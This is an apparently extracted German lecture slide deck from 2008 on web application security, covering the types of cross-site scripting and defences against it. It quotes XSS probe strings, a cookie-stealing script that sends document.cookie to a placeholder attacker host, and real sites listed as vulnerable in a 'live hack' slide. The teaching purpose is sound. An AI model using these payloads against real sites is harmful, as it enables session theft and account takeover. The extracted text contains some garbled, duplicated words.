Sicherheit Web basierter Anwendungen



Ähnliche Dokumente
Warum werden täglich tausende von Webseiten gehackt?

Web Application Security

OWASP Stammtisch München Sep 2014 XSS und andere Sicherheitslücken aus der Perspektive des Programmcodes

Web 2.0 (In) Security PHPUG Würzburg Björn Schotte

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

am Beispiel - SQL Injection

Secure Programming vs. Secure Development

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity

Hacker-Methoden in der IT- Sicherheitsausbildung. Dr. Martin Mink

Sicherheit in Webanwendungen CrossSite, Session und SQL

Schwachstellenanalyse 2012

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

am Beispiel - SQL Injection

Aktuelle Bedrohungen im Internet

Session Management und Cookies

Web-Sicherheit: Kein fauler Zauber?! Kai Jendrian. <Seminartitel> <Seminartitel>

itsc Admin-Tag OWASP Top 10 Tobias Ellenberger COO & Co-Partner OneConsult GmbH 2013 OneConsult GmbH

Datensicherheit. Vorlesung 5: Sommersemester 2015 h_da. Heiko Weber, Lehrbeauftragter

Baustein Webanwendungen. Stephan Klein, Jan Seebens

Live Hacking auf eine Citrix Umgebung

Abbildung der Gefährdungen der WASC und OWASP auf die Gefährdungen und Maßnahmenempfehlungen des IT-Grundschutz-Bausteins B 5.

Hacker-Tool Browser von der Webanwendung zu den Kronjuwelen

WEBAPPLIKATIONEN MIT PHP. Wo gibt es Hilfe? Wie fang ich an?

Sichere Webapplikationen nach ONR oder Wer liest meine s?

Aktuelle Sicherheitsprobleme im Internet

Lokale Installation von DotNetNuke 4 ohne IIS

Herzlich willkommen im Modul Web-Engineering

Operator Guide. Operator-Guide 1 / 7 V1.01 / jul.12

Schwachstellen in Web- Applikationen: Was steckt dahinter und wie nutzt man sie aus?

IHK: Web-Hacking-Demo

Schwachstellenanalyse 2013

Zusammenfassung Web-Security-Check ZIELSYSTEM

Web Sockets mit HTML5. Quelle:

Datensicherheit. Vorlesung 7: Sommersemester 2015 h_da. Heiko Weber, Lehrbeauftragter

Kurzanleitung zur Softwareverteilung von BitDefender Produkten...2

Hochschule Darmstadt Fachbereich Informatik

How- to. E- Mail- Marketing How- to. Subdomain anlegen. Ihr Kontakt zur Inxmail Academy

mysql - Clients MySQL - Abfragen eine serverbasierenden Datenbank

Kombinierte Attacke auf Mobile Geräte

How-to: Webserver NAT. Securepoint Security System Version 2007nx

Herzlich willkommen zur Kurzvorlesung: Die häufigsten Fehlerquellen bei der Erstellung von Webapplikationen. Udo H. Kalinna. Nürnberg, den

Norton Internet Security

MH3 D2/3 DB/4. Name: Matr.-Nr. Seite: 3. Aufgabe 1. (6 Punkte) a) Gegeben sei eine kryptographische Hashfunktion h^o,!}* mit Hashwert h^mo) = 4.

Praktikum IT-Sicherheit

PHPIDS Vortrag. PHP Usergroup Frankfurt am Main 14. Februar Autor: Tom Klingenberg. Web & Applikation

e-books aus der EBL-Datenbank

ESB - Elektronischer Service Bericht

Folgende Einstellungen sind notwendig, damit die Kommunikation zwischen Server und Client funktioniert:

Technische Grundlagen von Internetzugängen

Anleitung zum Prüfen von WebDAV

Seminar: Konzepte von Betriebssytem- Komponenten

Update und Konfiguraton mit dem ANTLOG Konfigurations-Assistenten

Georg Heß. Grünes Licht für verlässlichere Online- Services WEB APPLICATION SECURITY. Deutschland sicher im Netz e.v. Köln,

Home-Router als Einfallstor ins Firmennetzwerk?

Sage 200 BI Häufige Fehler & Lösungen. Version

Webalizer HOWTO. Stand:

Web Application Testing

Albert HAYR Linux, IT and Open Source Expert and Solution Architect. Open Source professionell einsetzen

Konfiguration des Internet Explorers 7

BusinessMail X.400 Webinterface Gruppenadministrator V2.6

pro4controlling - Whitepaper [DEU] Whitepaper zur CfMD-Lösung pro4controlling Seite 1 von 9

INSTALLATIONSANLEITUNG der Version 2.1 (Jänner 2014)

Übersicht Die Übersicht zeigt die Zusammenfassung der wichtigsten Daten.

Protect 7 Anti-Malware Service. Dokumentation

Tutorial. In diesem Tutorial möchte ich die Möglichkeiten einer mehrspracheigen Web-Site erläutern.

OpenWAF Web Application Firewall

Eigenen WSUS Server mit dem UNI WSUS Server Synchronisieren

Lexware professional und premium setzen bis einschließlich Version 2012 den Sybase SQL-Datenbankserver

OP-LOG

Wählen Sie bitte START EINSTELLUNGEN SYSTEMSTEUERUNG VERWALTUNG und Sie erhalten unter Windows 2000 die folgende Darstellung:

Administrator Handbuch

(1) Mit dem Administrator Modul werden die Datenbank, Gruppen, Benutzer, Projekte und sonstige Aufgaben verwaltet.

Web Applications Vulnerabilities

Matrix42. Use Case - Inventory. Version Februar

THEMA: "SAS STORED PROCESSES - SCHNELL GEZAUBERT" HELENE SCHMITZ

Netzwerksicherheit Übung 9 Websicherheit

Application Performance Management. Auch eine Frage des Netzwerkes?

FTP Tutorial. Das File Transfer Protocol dient dem Webmaster dazu eigene Dateien wie z.b. die geschriebene Webseite auf den Webserver zu laden.

Workflow, Business Process Management, 4.Teil

Praktische Erfahrungen aus hunderten von Sicherheitsabnahmen German OWASP Day Dr. Amir Alsbih CISO Haufe Gruppe

Android Remote Desktop & WEB

Enterprise Applikation Integration und Service-orientierte Architekturen. 09 Simple Object Access Protocol (SOAP)

Anleitung zum Prüfen von WebDAV

SZENARIO. ausgeführt Command Injection: Einschleusen (Injizieren) bösartiger Befehle zur Kompromittierung der Funktionsschicht

START - SYSTEMSTEUERUNG - SYSTEM - REMOTE

Wo finde ich die Software? - Jedem ProLiant Server liegt eine Management CD bei. - Über die Internetseite

Datenbank-basierte Webserver

COMPUTER MULTIMEDIA SERVICE

3. Stored Procedures und PL/SQL

.htaccess HOWTO. zum Schutz von Dateien und Verzeichnissen mittels Passwortabfrage

Konfiguration des Internet Explorers 8

Reporting Services und SharePoint 2010 Teil 1

Firewall-Logs: gewusst wie! (14:00 Uhr, Referat B) Firewall-Logs gezielt aufzeichnen und auswerten

Anwenderleitfaden Citrix. Stand Februar 2008

Heartbleed beats hard

Web Application Security

Upgrade auf die Standalone Editionen von Acronis Backup & Recovery 10. Technische Informationen (White Paper)

Infomelde-Server Einstellungen

Transkript:

Sicherheit Web basierter Anwendungen IT Sicherheit Dozent: Prof. Dr. Stefan Karsch Enriko Podehl 13.02.2008

Einleitung it Web basierte basierte Anwendungen Teil unseres Alltags Geben dabei persönliche Daten preis Aber auch Betreiber neuen Gfh Gefahren ausgesetzt Deswegen mit Bedrohungen beschäftigen 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 2

Zielsetzung Für Thematik sensibilisieren Fragen klären: Wie sehen die Gefahren aus? Wlh Welche Til Teile der Anwendung müssen geschützt werden? Wo findet sich Hilfe zum Thema? 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 3

Inhaltsverzeichnis h i 1. Angriffsebenen 2. Angriffsmethode (XSS) 2.1. Serverseitiges XSS 2.2. 22 Clientseitiges i i XSS 3. Methoden zum Schutz 4. Live Hack 5. Shl Schlussfolgerung fl 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 4

ANGRIFFSEBENEN 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 5

Angriffsebenen Web Application Security Statistics Project des WASC (2006) Überblick über Schwachstellen in Webanwendungen Unterschiedliche Scanner für unterschiedliche Ebenen 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 6

Vulnerabilitystack t Angriffsebenen nach Jeremiah Grossman [WAS06] 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 7

ANGRIFFSMETHODEN 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 8

Statistikergebnisse ti tik i (I) Prozentsatz der angreifbaren Webseiten, nach Angriffsklassen [WAS06] 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 9

Statistikergebnisse ti tik i (II) Häufigsten Schwachstellen, nach Angriffsklassen [WAS06] 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 10

Top 10 der OWASP (2007) 1. Cross Site Scripting i 2. Injection Flaws (u. a. SQL Injection) 3. Melicious File Execution 4. Insecure Direct Object Reference 5. Cross Site Request Forgery 6. Information Leakage and Inproper Error Handling 7. Broken Authentication and Session Management 8. Insecure Cryptographie Storage 9. Insecure Communications 10. Failure to Restrict URL Access 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 11

XSS Keine einheitlichen i h Beschreibungen oder Definitionen XSS: ausführbarer Code über eine Webseite verteilt, im Browser des Anwenders ausgeführt Meist HTML/JavaScript Ziel: Code im Browser des Anwenders ausführen Zweck: Account des Benutzers übernehmen, Browser auf andere Seite umleiten oder betrügerischen Inhalt zeigen 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 12

Serverseitiges XSS Command Execution Angriffe Daten des Servers erspähen, in Server eindringen, Daten verändern, Dienste lahmlegen Angriff auf unterschiedlichen h Schichten Shih möglich ölih Auch als temporäres XSS bekannt Information Disclosure, Vorbereitung für komplexere Angriffe, aber auch Protscans, Server DoS oder Brute Force Attacken möglich 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 13

Clientseitiges iti XSS Angriff richtet sich gegen Benutzer einer bestimmten Webseite Vertrauensverhältnis von Nutzer N zu Webseite W ausgenutzt Bsp.: gefälschte Informationen präsentieren, Daten vom Rechner von N erspähen, die von Sicherheitseinstellungen eigentlich nur an W gesendet werden dürfen 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 14

Angriffsstrings i Viele Quellen im Internet ';alert(string.fromcharcode(88,83,83))//\ 83 83))//\';alert(String.from CharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))/ /\";alert(string.fromcharcode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</ > ><SCRIPT>alert(String.fromCharCode(88,83,83))</ SCRIPT> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <BODY ONLOAD=alert('XSS')> Quelle: http://ha.ckers.org/xss.html 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 15

Rflkti Reflektiertes t XSS (I) Unterscheidet 3 Haupttypen von XSS Reflektiertes XSS am häufigsten Opfer muss präparierte URL anklicken In Variablenparametern der URL wird der Schadcode versteckt Aktuelle Beispiele auf Phishmarkt (http://baseportal.com/baseportal/phishmarkt/at) 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 16

Rflkti Reflektiertes t XSS (II) Browser Server Datenbank URL Anfrage durch Opfer Webapplikation Webseite Server Antwort HTML Bug Schadcode [HEI07] 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 17

Rflkti Reflektiertes t XSS (III) Beispiel: personalisierte Webseite http://portal.example/index.php?sessionid=12312312&username=joe JavaScript zum Cookie Diebstahl (URL encoded) http://portal.example/index.php?sessionid=12312312&username=%3c%73% p p p p 63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6 E%3D%27%68%74%74%70%3A%2F%2F%61%74%74%61%63%6B%65%72%68%6F%73%74%2E %65%78%61%6D%70%6C%65%2F%63%67%69%2D%62%69%6E%2F%63%6F%6F%6B%69%65% 73%74%65%61%6C%2E%63%67%69%3F%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6 F%6F%6B%69%65%3C%2F%73%63%72%69%70%74%3E Decodierte URL [Con04, Seite Sit 25f] http://portal.example/index.php?sessionid=12312312&username=<script >document.location='http://attackerhost.example/cgi- p bin/cookiesteal.cgi?'+document.cookie</script> 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 18

Persistentes t XSS (I) Auch stored oder beständiges XSS genannt, ähnlich dem reflektierten XSS Server spielt Schadcode aus URL als Webinhalt an Browser zurück Zwischenstopp in Serverdatenbank Liefert dadurch Schadcode auch an andere Anwender aus Häufig der Angreifer, der den manipulierten Link zum ersten Mal klickt 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 19

Persistentes t XSS (II) Browser URL Server Datenbank 1. Anfrage durch Angreifer URL Nachfolgende Anfragen durch Opfer Webapplikation Webseite Server Antwort HTML Bug Schadcode [HEI07] 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 20

Persistentes t XSS (III) Beispiel: Diebstahl eines Cookies von registriertem Nutzer (Bulletin Board) Angreifer hinterläßt Nachricht mit folgendem Code: <SCRIPT> document.location='http://attackerhost.example/cgibin/cookiesteal.cgi?'+document.cookie </SCRIPT> Benutzer liest dies, sein Cookiewird id gestohlen, Account ist kompromittiert [Con04, Seite 25] 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 21

Lokales XSS (I) Angiff spielt sich auf Rechner des Anwenders ab Tritt besonders bei Web 2.0 Anwendungen auf Server liefert nur fhl fehlerhafte hf Script (Java/JavaScript) an Browser, aber nicht den Schadcode 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 22

Lokales XSS (II) Browser Server URL Anfrage durch Opfer Datenbank Scriptcode Webseite DOM Zugriffe Server Antwort Server Antwort Webapplikation Scriptcode HTML Bug Schadcode [HEI07] 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 23

Lokales XSS (III) Baumartige Document Object Model, dass ganze Webseite repräsentiert, spielt besondere Rolle Daher Bezeichnung: DOM basiertes XSS ÜberZugriff auf DOM Baum dynamische Änderung an der dargestellten Webseite möglich Hier kopiert fehlerhaftes browserseitiges Anwendungsscript den Schadcode direkt aus der URL per DOM Zugriff in angezeigte Webseite 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 24

Fazit Angriffsmethoden hängen oft zusammen oder treten in Kombination auf (z. B. XSS mit SQL Injection, HTTP Response Splitting oder CSRF) Abgrenzung dadurch schwierig Größte Schwachstelle: unzureichende Input und Output Filterung 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 25

METHODEN ZUM SCHUTZ 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 26

Wbhild Webshields Auch hwba Web Application Firewall, Filtern Dt Datenstrom t zwischen Browser und Webanwendung Tritt unzulässigeseingabemusterauf auf, wird Transfer unterbrochen oder anders reagiert Einige Webshieldskönnen auch Daten vom Webserver an den Browser überwachen Erkennennicht nicht alle Angriffsformen, dienteherals eher Ergänzung (Second Line of Defense) Integration tlw. schwierig, höhere Lastanforderung und Abhängigkeit zu anderen Systemen (im Vergleich zu Netzwerk Firewalls) 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 27

WbS WebScanner Programme für Penetrationstests ti t t Untersuchen Anwendungen auf bekannte Schwachstellen Auf Client Computer Computer installiert Vier Phasen Crawl/Scan Analyse Audit/Penetrationstest Reporting Sinnvolle Tools, ersetzen aber keine Experten oder fehlendes Know how 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 28

Input und Output Filterung t Input Filterung Eingehende Daten (Formulare, URL) decodieren, validieren, filtern Whitelisting ist Blacklisting vorzuziehen Viele kleine Filter erstellen, komplexe so nachbilden Output Filterung t Ausgabe darf keinen ausführbaren Code enthalten Solche Zeichen invalidieren Header Manipulation verhindern 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 29

LIVE HACK 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 30

Live Hack ';alert(string.fromcharcode(88,83,83))//\';alert(string.from CharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))/ /\";alert(string.fromcharcode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</ 83 83 / SCRIPT> Beispielangriff durchführen Angriffsstring bei PHPIDS analysieren Erfolgreich bei: http://www.boxxet.com/giorgio_armani/source:blog.buch club net.de http://www.bam.de/de/basis/suche/index.htm http://217.79.220.15//exe.php3 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 31

SCHLUSSFOLGERUNG 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 32

Shl Schlussfolgerung fl Sicherheit in Web basierten basierten Anwendungen sehr ernst nehmen Vielfältige Bedrohungen, XSS besonders gefährlich (Kombinationen mit anderen Angriffsklassen) Filter und Scanner alleine reichen nicht aus Besonders sensibel für Input und Output Filterung 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 33

Literturverzeichnist i i [WAS06] WASC. Web application i security statistics. i Internet, 2006. http://www.webappsec.org/projects/statistics/, Stand: 11.12.2007. [HEI07] Heise Security. Gesundes Misstrauen.. Internet, 2007. http://www.heise.de/security/artikel/print/84149, Stand: 07.01.2008 [Con04] Web Application Security Consortium. Web Application Security Consortium: Threat Classification,, 1. edition, 2004. http://www.webappsec.org/projects/threat/v1/wasc TC v1_0.de.pdf, Stand: 11.12.200. 13.02.2008 Fachhochschule Köln Master Medieninformatik IT Sicherheit WS 07/08 Enriko Podehl 34